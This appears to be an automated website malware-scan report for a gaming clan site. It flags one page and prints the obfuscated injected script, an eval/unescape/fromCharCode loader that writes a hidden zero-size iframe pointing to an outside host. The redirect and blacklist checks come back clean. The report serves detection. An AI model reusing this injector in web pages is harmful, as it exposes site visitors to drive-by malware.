Scanned pages/files
Request | Server response | Status |
http://headshot-cs.clan.su/index/0-11 | 200 OK Content-Length: 118891 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C115%2C56%2C46%2C115%2C116%2C101%2C97%2C100%2C121%2C104%2C111%2C115%2C116%2C46%2C114%2C117%2C58%2C56%2C49%2C47%2C126%2C101%2C108%2C118%2C105%2C122%2C105%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); Decoded script: document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,56,46,115,116,101,97,100,121,104,111,115,116,46,114,117,58,56,49,47,126,101,108,118,105,122,105,47,105,99,101,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62)); document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,56,46,115,116,101,97,100,121,104,111,115,116,46,114,117,58,56,49,47,126,101,108,118,105,122,105,47,105,99,101,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62)); <iframe src="http://www.s8.steadyhost.ru:81/~elvizi/ice/index.php" width="0" height="0"></iframe> Antivirus reports:
| ||
http://s7.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s7.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s7.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://www.ruscounter.com/count.php?site=7452 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.ruscounter.com/test404page.js | 404 Not Found Content-Length: 9626 Content-Type: text/html | clean |
http://1directory.ru/cnt.php?id=82 | 200 OK Content-Length: 20 Content-Type: text/html | clean |
http://1directory.ru/test404page.js | 404 Not Found Content-Length: 9822 Content-Type: text/html | clean |
http://1directory.ru/ | 200 OK Content-Length: 9822 Content-Type: text/html | clean |
http://1directory.ru/register.php | 200 OK Content-Length: 9571 Content-Type: text/html | clean |
http://1directory.ru/top.php?view=best | 200 OK Content-Length: 56642 Content-Type: text/html | clean |
http://1directory.ru/top.php?view=new | 200 OK Content-Length: 59678 Content-Type: text/html | clean |
http://1directory.ru/statistic.php | 200 OK Content-Length: 9206 Content-Type: text/html | clean |
http://1directory.ru/contacts.php | 200 OK Content-Length: 3602 Content-Type: text/html | clean |
http://1directory.ru/categories.php?cat=Avto_i_moto | 200 OK Content-Length: 32195 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: headshot-cs.clan.su
Result:
GET / HTTP/1.1
Host: headshot-cs.clan.su
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: headshot-cs.clan.su
Referer: http://www.google.com/search?q=headshot-cs.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: headshot-cs.clan.su
Referer: http://www.google.com/search?q=headshot-cs.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=headshot-cs.clan.su
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://headshot-cs.clan.su/
Result: headshot-cs.clan.su is not infected or malware details are not published yet.
Result: headshot-cs.clan.su is not infected or malware details are not published yet.